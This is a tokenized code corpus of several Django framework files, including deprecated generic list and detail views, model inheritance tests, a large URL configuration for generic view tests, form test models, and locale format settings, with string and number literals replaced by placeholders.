<s> from django . template import loader , RequestContext <EOL> from django . http import Http404 , HttpResponse <EOL> from django . core . xheaders import populate_xheaders <EOL> from django . core . paginator import Paginator , InvalidPage <EOL> from django . core . exceptions import ObjectDoesNotExist <EOL> import warnings <EOL> warnings . warn ( <EOL> '<STR_LIT>' , <EOL> PendingDeprecationWarning <EOL> ) <EOL> def object_list ( request , queryset , paginate_by = None , page = None , <EOL> allow_empty = True , template_name = None , template_loader = loader , <EOL> extra_context = None , context_processors = None , template_object_name = '<STR_LIT:object>' , <EOL> mimetype = None ) : <EOL> """<STR_LIT>""" <EOL> if extra_context is None : extra_context = { } <EOL> queryset = queryset . _clone ( ) <EOL> if paginate_by : <EOL> paginator = Paginator ( queryset , paginate_by , allow_empty_first_page = allow_empty ) <EOL> if not page : <EOL> page = request . GET . get ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> try : <EOL> page_number = int ( page ) <EOL> except ValueError : <EOL> if page == '<STR_LIT>' : <EOL> page_number = paginator . num_pages <EOL> else : <EOL> raise Http404 <EOL> try : <EOL> page_obj = paginator . page ( page_number ) <EOL> except InvalidPage : <EOL> raise Http404 <EOL> c = RequestContext ( request , { <EOL> '<STR_LIT>' % template_object_name : page_obj . object_list , <EOL> '<STR_LIT>' : paginator , <EOL> '<STR_LIT>' : page_obj , <EOL> '<STR_LIT>' : page_obj . has_other_pages ( ) , <EOL> '<STR_LIT>' : paginator . per_page , <EOL> '<STR_LIT>' : page_obj . has_next ( ) , <EOL> '<STR_LIT>' : page_obj . has_previous ( ) , <EOL> '<STR_LIT>' : page_obj . number , <EOL> '<STR_LIT>' : page_obj . next_page_number ( ) , <EOL> '<STR_LIT>' : page_obj . previous_page_number ( ) , <EOL> '<STR_LIT>' : page_obj . start_index ( ) , <EOL> '<STR_LIT>' : page_obj . end_index ( ) , <EOL> '<STR_LIT>' : paginator . num_pages , <EOL> '<STR_LIT>' : paginator . 
count , <EOL> '<STR_LIT>' : paginator . page_range , <EOL> } , context_processors ) <EOL> else : <EOL> c = RequestContext ( request , { <EOL> '<STR_LIT>' % template_object_name : queryset , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False , <EOL> } , context_processors ) <EOL> if not allow_empty and len ( queryset ) == <NUM_LIT:0> : <EOL> raise Http404 <EOL> for key , value in extra_context . items ( ) : <EOL> if callable ( value ) : <EOL> c [ key ] = value ( ) <EOL> else : <EOL> c [ key ] = value <EOL> if not template_name : <EOL> model = queryset . model <EOL> template_name = "<STR_LIT>" % ( model . _meta . app_label , model . _meta . object_name . lower ( ) ) <EOL> t = template_loader . get_template ( template_name ) <EOL> return HttpResponse ( t . render ( c ) , mimetype = mimetype ) <EOL> def object_detail ( request , queryset , object_id = None , slug = None , <EOL> slug_field = '<STR_LIT>' , template_name = None , template_name_field = None , <EOL> template_loader = loader , extra_context = None , <EOL> context_processors = None , template_object_name = '<STR_LIT:object>' , <EOL> mimetype = None ) : <EOL> """<STR_LIT>""" <EOL> if extra_context is None : extra_context = { } <EOL> model = queryset . model <EOL> if object_id : <EOL> queryset = queryset . filter ( pk = object_id ) <EOL> elif slug and slug_field : <EOL> queryset = queryset . filter ( ** { slug_field : slug } ) <EOL> else : <EOL> raise AttributeError ( "<STR_LIT>" ) <EOL> try : <EOL> obj = queryset . get ( ) <EOL> except ObjectDoesNotExist : <EOL> raise Http404 ( "<STR_LIT>" % ( model . _meta . verbose_name ) ) <EOL> if not template_name : <EOL> template_name = "<STR_LIT>" % ( model . _meta . app_label , model . _meta . object_name . lower ( ) ) <EOL> if template_name_field : <EOL> template_name_list = [ getattr ( obj , template_name_field ) , template_name ] <EOL> t = template_loader . select_template ( template_name_list ) <EOL> else : <EOL> t = template_loader . 
get_template ( template_name ) <EOL> c = RequestContext ( request , { <EOL> template_object_name : obj , <EOL> } , context_processors ) <EOL> for key , value in extra_context . items ( ) : <EOL> if callable ( value ) : <EOL> c [ key ] = value ( ) <EOL> else : <EOL> c [ key ] = value <EOL> response = HttpResponse ( t . render ( c ) , mimetype = mimetype ) <EOL> populate_xheaders ( request , response , model , getattr ( obj , obj . _meta . pk . name ) ) <EOL> return response </s>
<s> from operator import attrgetter <EOL> from django . core . exceptions import FieldError <EOL> from django . test import TestCase <EOL> from models import ( Chef , CommonInfo , ItalianRestaurant , ParkingLot , Place , <EOL> Post , Restaurant , Student , StudentWorker , Supplier , Worker , MixinModel ) <EOL> class ModelInheritanceTests ( TestCase ) : <EOL> def test_abstract ( self ) : <EOL> w1 = Worker . objects . create ( name = "<STR_LIT>" , age = <NUM_LIT> , job = "<STR_LIT>" ) <EOL> w2 = Worker . objects . create ( name = "<STR_LIT>" , age = <NUM_LIT> , job = "<STR_LIT>" ) <EOL> s = Student . objects . create ( name = "<STR_LIT>" , age = <NUM_LIT:5> , school_class = "<STR_LIT>" ) <EOL> self . assertEqual ( unicode ( w1 ) , "<STR_LIT>" ) <EOL> self . assertEqual ( unicode ( s ) , "<STR_LIT>" ) <EOL> self . assertQuerysetEqual ( <EOL> Worker . objects . values ( "<STR_LIT:name>" ) , [ <EOL> { "<STR_LIT:name>" : "<STR_LIT>" } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" } , <EOL> ] , <EOL> lambda o : o <EOL> ) <EOL> self . assertEqual ( Student . _meta . ordering , [ ] ) <EOL> self . assertRaises ( AttributeError , lambda : CommonInfo . objects . all ( ) ) <EOL> self . assertRaises ( Student . DoesNotExist , <EOL> StudentWorker . objects . get , pk = <NUM_LIT> <EOL> ) <EOL> self . assertRaises ( Worker . DoesNotExist , <EOL> StudentWorker . objects . get , pk = <NUM_LIT> <EOL> ) <EOL> sw1 = StudentWorker ( ) <EOL> sw1 . name = "<STR_LIT>" <EOL> sw1 . age = <NUM_LIT> <EOL> sw1 . save ( ) <EOL> sw2 = StudentWorker ( ) <EOL> sw2 . name = "<STR_LIT>" <EOL> sw2 . age = <NUM_LIT> <EOL> sw2 . save ( ) <EOL> self . assertRaises ( Student . MultipleObjectsReturned , <EOL> StudentWorker . objects . get , pk__lt = sw2 . pk + <NUM_LIT:100> <EOL> ) <EOL> self . assertRaises ( Worker . MultipleObjectsReturned , <EOL> StudentWorker . objects . get , pk__lt = sw2 . pk + <NUM_LIT:100> <EOL> ) <EOL> def test_multiple_table ( self ) : <EOL> post = Post . objects . 
create ( title = "<STR_LIT>" ) <EOL> post . attached_comment_set . create ( content = "<STR_LIT>" , is_spam = True ) <EOL> post . attached_link_set . create ( <EOL> content = "<STR_LIT>" , <EOL> url = "<STR_LIT>" <EOL> ) <EOL> self . assertRaises ( AttributeError , <EOL> getattr , post , "<STR_LIT>" <EOL> ) <EOL> p1 = Place . objects . create ( name = "<STR_LIT>" , address = "<STR_LIT>" ) <EOL> p2 = Place . objects . create ( name = "<STR_LIT>" , address = "<STR_LIT>" ) <EOL> r = Restaurant . objects . create ( <EOL> name = "<STR_LIT>" , <EOL> address = "<STR_LIT>" , <EOL> serves_hot_dogs = True , <EOL> serves_pizza = False , <EOL> rating = <NUM_LIT:2> <EOL> ) <EOL> c = Chef . objects . create ( name = "<STR_LIT>" ) <EOL> ir = ItalianRestaurant . objects . create ( <EOL> name = "<STR_LIT>" , <EOL> address = "<STR_LIT>" , <EOL> serves_hot_dogs = False , <EOL> serves_pizza = False , <EOL> serves_gnocchi = True , <EOL> rating = <NUM_LIT:4> , <EOL> chef = c <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> ItalianRestaurant . objects . filter ( address = "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> ir . address = "<STR_LIT>" <EOL> ir . save ( ) <EOL> self . assertQuerysetEqual ( <EOL> ItalianRestaurant . objects . filter ( address = "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> self . assertEqual ( <EOL> [ f . name for f in Restaurant . _meta . fields ] , <EOL> [ "<STR_LIT:id>" , "<STR_LIT:name>" , "<STR_LIT:address>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> ) <EOL> self . assertEqual ( <EOL> [ f . name for f in ItalianRestaurant . _meta . fields ] , <EOL> [ "<STR_LIT:id>" , "<STR_LIT:name>" , "<STR_LIT:address>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> ) <EOL> self . assertEqual ( Restaurant . _meta . ordering , [ "<STR_LIT>" ] ) <EOL> self . 
assertQuerysetEqual ( Place . objects . filter ( supplier__name = "<STR_LIT:foo>" ) , [ ] ) <EOL> self . assertRaises ( FieldError , <EOL> Restaurant . objects . filter , supplier__name = "<STR_LIT:foo>" <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Restaurant . objects . filter ( name = "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> ItalianRestaurant . objects . filter ( address = "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> p = Place . objects . get ( name = "<STR_LIT>" ) <EOL> self . assertIs ( type ( p ) , Place ) <EOL> self . assertEqual ( <EOL> p . restaurant , Restaurant . objects . get ( name = "<STR_LIT>" ) <EOL> ) <EOL> self . assertEqual ( <EOL> Place . objects . get ( name = "<STR_LIT>" ) . restaurant . italianrestaurant , <EOL> ItalianRestaurant . objects . get ( name = "<STR_LIT>" ) <EOL> ) <EOL> self . assertEqual ( <EOL> Restaurant . objects . get ( name = "<STR_LIT>" ) . italianrestaurant , <EOL> ItalianRestaurant . objects . get ( name = "<STR_LIT>" ) <EOL> ) <EOL> self . assertRaises ( ItalianRestaurant . DoesNotExist , <EOL> lambda : p . restaurant . italianrestaurant <EOL> ) <EOL> self . assertRaises ( Place . DoesNotExist , <EOL> ItalianRestaurant . objects . get , name = "<STR_LIT>" <EOL> ) <EOL> self . assertRaises ( Place . MultipleObjectsReturned , <EOL> Restaurant . objects . get , id__lt = <NUM_LIT> <EOL> ) <EOL> s1 = Supplier . objects . create ( name = "<STR_LIT>" , address = "<STR_LIT>" ) <EOL> s1 . customers = [ r , ir ] <EOL> s2 = Supplier . objects . create ( name = "<STR_LIT>" , address = "<STR_LIT>" ) <EOL> s2 . customers = [ ir ] <EOL> p = Place . objects . get ( name = "<STR_LIT>" ) <EOL> self . assertRaises ( Restaurant . DoesNotExist , <EOL> lambda : p . restaurant <EOL> ) <EOL> self . assertEqual ( p . supplier , s1 ) <EOL> self . assertQuerysetEqual ( <EOL> ir . provider . 
order_by ( "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Restaurant . objects . filter ( provider__name__contains = "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> ItalianRestaurant . objects . filter ( provider__name__contains = "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) , <EOL> ) <EOL> park1 = ParkingLot . objects . create ( <EOL> name = "<STR_LIT>" , address = "<STR_LIT>" , main_site = s1 <EOL> ) <EOL> park2 = ParkingLot . objects . create ( <EOL> name = "<STR_LIT>" , address = "<STR_LIT>" , main_site = ir <EOL> ) <EOL> self . assertEqual ( <EOL> Restaurant . objects . get ( lot__name = "<STR_LIT>" ) . name , <EOL> "<STR_LIT>" <EOL> ) <EOL> rows = Restaurant . objects . filter ( <EOL> serves_hot_dogs = True , name__contains = "<STR_LIT:D>" <EOL> ) . update ( <EOL> name = "<STR_LIT>" , serves_hot_dogs = False <EOL> ) <EOL> self . assertEqual ( rows , <NUM_LIT:1> ) <EOL> r1 = Restaurant . objects . get ( pk = r . pk ) <EOL> self . assertFalse ( r1 . serves_hot_dogs ) <EOL> self . assertEqual ( r1 . name , "<STR_LIT>" ) <EOL> self . assertQuerysetEqual ( <EOL> ItalianRestaurant . objects . values ( "<STR_LIT:name>" , "<STR_LIT>" ) , [ <EOL> { "<STR_LIT>" : <NUM_LIT:4> , "<STR_LIT:name>" : "<STR_LIT>" } <EOL> ] , <EOL> lambda o : o <EOL> ) <EOL> self . assertNumQueries ( <NUM_LIT:2> , <EOL> lambda : ItalianRestaurant . objects . all ( ) [ <NUM_LIT:0> ] . chef <EOL> ) <EOL> self . assertNumQueries ( <NUM_LIT:1> , <EOL> lambda : ItalianRestaurant . objects . select_related ( "<STR_LIT>" ) [ <NUM_LIT:0> ] . chef <EOL> ) <EOL> def test_mixin_init ( self ) : <EOL> m = MixinModel ( ) <EOL> self . assertEqual ( m . other_attr , <NUM_LIT:1> ) </s>
<s> from django . db import models <EOL> from django . contrib import admin <EOL> class Band ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> bio = models . TextField ( ) <EOL> rank = models . IntegerField ( ) <EOL> class Meta : <EOL> ordering = ( '<STR_LIT:name>' , ) <EOL> class Song ( models . Model ) : <EOL> band = models . ForeignKey ( Band ) <EOL> name = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> duration = models . IntegerField ( ) <EOL> class Meta : <EOL> ordering = ( '<STR_LIT:name>' , ) <EOL> class SongInlineDefaultOrdering ( admin . StackedInline ) : <EOL> model = Song <EOL> class SongInlineNewOrdering ( admin . StackedInline ) : <EOL> model = Song <EOL> ordering = ( '<STR_LIT>' , ) </s>
<s> import warnings <EOL> from django . test . utils import get_warnings_state , restore_warnings_state <EOL> from regressiontests . comment_tests . tests import CommentTestCase <EOL> class CommentFeedTests ( CommentTestCase ) : <EOL> urls = '<STR_LIT>' <EOL> feed_url = '<STR_LIT>' <EOL> def test_feed ( self ) : <EOL> response = self . client . get ( self . feed_url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( response [ '<STR_LIT:Content-Type>' ] , '<STR_LIT>' ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> class LegacyCommentFeedTests ( CommentFeedTests ) : <EOL> feed_url = '<STR_LIT>' <EOL> def setUp ( self ) : <EOL> self . _warnings_state = get_warnings_state ( ) <EOL> warnings . filterwarnings ( "<STR_LIT:ignore>" , category = DeprecationWarning , <EOL> module = '<STR_LIT>' ) <EOL> warnings . filterwarnings ( "<STR_LIT:ignore>" , category = DeprecationWarning , <EOL> module = '<STR_LIT>' ) <EOL> def tearDown ( self ) : <EOL> restore_warnings_state ( self . _warnings_state ) </s>
<s> from django . conf . urls . defaults import * <EOL> from django . views . generic import TemplateView <EOL> from django . views . decorators . cache import cache_page <EOL> import views <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> ( r'<STR_LIT>' , <EOL> TemplateView . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> TemplateView . as_view ( template_name = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . CustomTemplateView . as_view ( template_name = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> cache_page ( <NUM_LIT> ) ( TemplateView . as_view ( template_name = '<STR_LIT>' ) ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . ObjectDetail . as_view ( ) ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . ArtistDetail . as_view ( ) , <EOL> name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . AuthorDetail . as_view ( ) , <EOL> name = "<STR_LIT>" ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorDetail . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorDetail . as_view ( template_name_suffix = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorDetail . as_view ( template_name = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorDetail . as_view ( context_object_name = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorDetail . as_view ( context_object_name = '<STR_LIT:object>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . PageDetail . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorDetail . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorDetail . as_view ( queryset = None ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . ArtistCreate . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . ArtistUpdate . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . NaiveAuthorCreate . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . NaiveAuthorCreate . as_view ( success_url = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . NaiveAuthorCreate . 
as_view ( success_url = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorCreateRestricted . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorCreate . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . SpecializedAuthorCreate . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . NaiveAuthorUpdate . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . NaiveAuthorUpdate . as_view ( success_url = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . NaiveAuthorUpdate . as_view ( success_url = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorUpdate . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . OneAuthorUpdate . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . SpecializedAuthorUpdate . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . NaiveAuthorDelete . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . NaiveAuthorDelete . as_view ( success_url = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorDelete . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . SpecializedAuthorDelete . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookArchive . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookArchive . as_view ( context_object_name = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookArchive . as_view ( allow_empty = True ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookArchive . as_view ( template_name = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookArchive . as_view ( template_name_suffix = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookArchive . as_view ( queryset = None ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookArchive . as_view ( paginate_by = <NUM_LIT:10> ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . DictList . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . DictList . as_view ( paginate_by = <NUM_LIT:1> ) ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . ArtistList . as_view ( ) , <EOL> name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . 
AuthorList . as_view ( ) , <EOL> name = "<STR_LIT>" ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorList . as_view ( paginate_by = <NUM_LIT:30> ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorList . as_view ( paginate_by = <NUM_LIT:30> ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorList . as_view ( allow_empty = False ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorList . as_view ( template_name = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorList . as_view ( template_name_suffix = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorList . as_view ( context_object_name = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorList . as_view ( context_object_name = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorList . as_view ( queryset = None ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorList . as_view ( paginate_by = <NUM_LIT:5> , paginator_class = views . CustomPaginator ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorListCustomPaginator . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookYearArchive . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookYearArchive . as_view ( make_object_list = True ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookYearArchive . as_view ( allow_empty = True ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookYearArchive . as_view ( allow_future = True ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookYearArchive . as_view ( make_object_list = True , paginate_by = <NUM_LIT:30> ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookYearArchive . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookMonthArchive . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookMonthArchive . as_view ( month_format = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookMonthArchive . as_view ( allow_empty = True ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookMonthArchive . as_view ( allow_future = True ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookMonthArchive . 
as_view ( paginate_by = <NUM_LIT:30> ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookMonthArchive . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookWeekArchive . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookWeekArchive . as_view ( allow_empty = True ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookWeekArchive . as_view ( allow_future = True ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookWeekArchive . as_view ( paginate_by = <NUM_LIT:30> ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookWeekArchive . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookWeekArchive . as_view ( week_format = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookDayArchive . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookDayArchive . as_view ( month_format = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookDayArchive . as_view ( allow_empty = True ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookDayArchive . as_view ( allow_future = True ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookDayArchive . as_view ( paginate_by = True ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookDayArchive . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookTodayArchive . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookTodayArchive . as_view ( allow_empty = True ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookDetail . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookDetail . as_view ( month_format = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookDetail . as_view ( allow_future = True ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookDetail . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookDetail . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) <EOL> ) </s>
<s> import os <EOL> from django . db import models <EOL> from django . core . exceptions import ValidationError <EOL> class Person ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> class Triple ( models . Model ) : <EOL> left = models . IntegerField ( ) <EOL> middle = models . IntegerField ( ) <EOL> right = models . IntegerField ( ) <EOL> class Meta : <EOL> unique_together = ( ( '<STR_LIT:left>' , '<STR_LIT>' ) , ( u'<STR_LIT>' , u'<STR_LIT:right>' ) ) <EOL> class FilePathModel ( models . Model ) : <EOL> path = models . FilePathField ( path = os . path . dirname ( __file__ ) , match = "<STR_LIT>" , blank = True ) <EOL> class Publication ( models . Model ) : <EOL> title = models . CharField ( max_length = <NUM_LIT:30> ) <EOL> date_published = models . DateField ( ) <EOL> def __unicode__ ( self ) : <EOL> return self . title <EOL> class Article ( models . Model ) : <EOL> headline = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> publications = models . ManyToManyField ( Publication ) <EOL> def __unicode__ ( self ) : <EOL> return self . headline <EOL> class CustomFileField ( models . FileField ) : <EOL> def save_form_data ( self , instance , data ) : <EOL> been_here = getattr ( self , '<STR_LIT>' , False ) <EOL> assert not been_here , "<STR_LIT>" <EOL> setattr ( self , '<STR_LIT>' , True ) <EOL> class CustomFF ( models . Model ) : <EOL> f = CustomFileField ( upload_to = '<STR_LIT>' , blank = True ) <EOL> class RealPerson ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> def clean ( self ) : <EOL> if self . name . lower ( ) == '<STR_LIT>' : <EOL> raise ValidationError ( "<STR_LIT>" ) <EOL> class Author ( models . Model ) : <EOL> publication = models . OneToOneField ( Publication , null = True , blank = True ) <EOL> full_name = models . CharField ( max_length = <NUM_LIT:255> ) <EOL> class Author1 ( models . Model ) : <EOL> publication = models . 
OneToOneField ( Publication , null = False ) <EOL> full_name = models . CharField ( max_length = <NUM_LIT:255> ) <EOL> class Homepage ( models . Model ) : <EOL> url = models . URLField ( verify_exists = False ) <EOL> class Document ( models . Model ) : <EOL> myfile = models . FileField ( upload_to = '<STR_LIT>' , blank = True ) <EOL> class Edition ( models . Model ) : <EOL> author = models . ForeignKey ( Person ) <EOL> publication = models . ForeignKey ( Publication ) <EOL> edition = models . IntegerField ( ) <EOL> isbn = models . CharField ( max_length = <NUM_LIT> , unique = True ) <EOL> class Meta : <EOL> unique_together = ( ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ) </s>
<s> from django . http import HttpResponse <EOL> from django . utils . decorators import decorator_from_middleware <EOL> from django . views . generic import View <EOL> from django . middleware . doc import XViewMiddleware <EOL> xview_dec = decorator_from_middleware ( XViewMiddleware ) <EOL> def xview ( request ) : <EOL> return HttpResponse ( ) <EOL> class XViewClass ( View ) : <EOL> def get ( request ) : <EOL> return HttpResponse ( ) </s>
<s> from django . conf . urls . defaults import patterns <EOL> import views <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> ( r'<STR_LIT>' , views . get_person ) , <EOL> ) </s>
<s> from debug import * <EOL> from defaults import * <EOL> from generic . create_update import * <EOL> from generic . date_based import * <EOL> from generic . object_list import * <EOL> from generic . simple import * <EOL> from i18n import * <EOL> from shortcuts import * <EOL> from specials import * <EOL> from static import * </s>
<s> DATE_FORMAT = '<STR_LIT>' <EOL> TIME_FORMAT = '<STR_LIT>' <EOL> DATETIME_FORMAT = '<STR_LIT>' <EOL> YEAR_MONTH_FORMAT = '<STR_LIT>' <EOL> MONTH_DAY_FORMAT = '<STR_LIT>' <EOL> SHORT_DATE_FORMAT = '<STR_LIT>' <EOL> SHORT_DATETIME_FORMAT = '<STR_LIT>' <EOL> FIRST_DAY_OF_WEEK = <NUM_LIT:1> <EOL> DATE_INPUT_FORMATS = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> ) <EOL> TIME_INPUT_FORMATS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> DATETIME_INPUT_FORMATS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> DECIMAL_SEPARATOR = '<STR_LIT:U+002C>' <EOL> THOUSAND_SEPARATOR = '<STR_LIT:.>' <EOL> NUMBER_GROUPING = <NUM_LIT:3> </s>
<s> import warnings <EOL> from django . template import Library <EOL> from django . templatetags . static import PrefixNode <EOL> register = Library ( ) <EOL> @ register . simple_tag <EOL> def admin_media_prefix ( ) : <EOL> """<STR_LIT>""" <EOL> warnings . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , PendingDeprecationWarning ) <EOL> return PrefixNode . handle_simple ( "<STR_LIT>" ) </s>
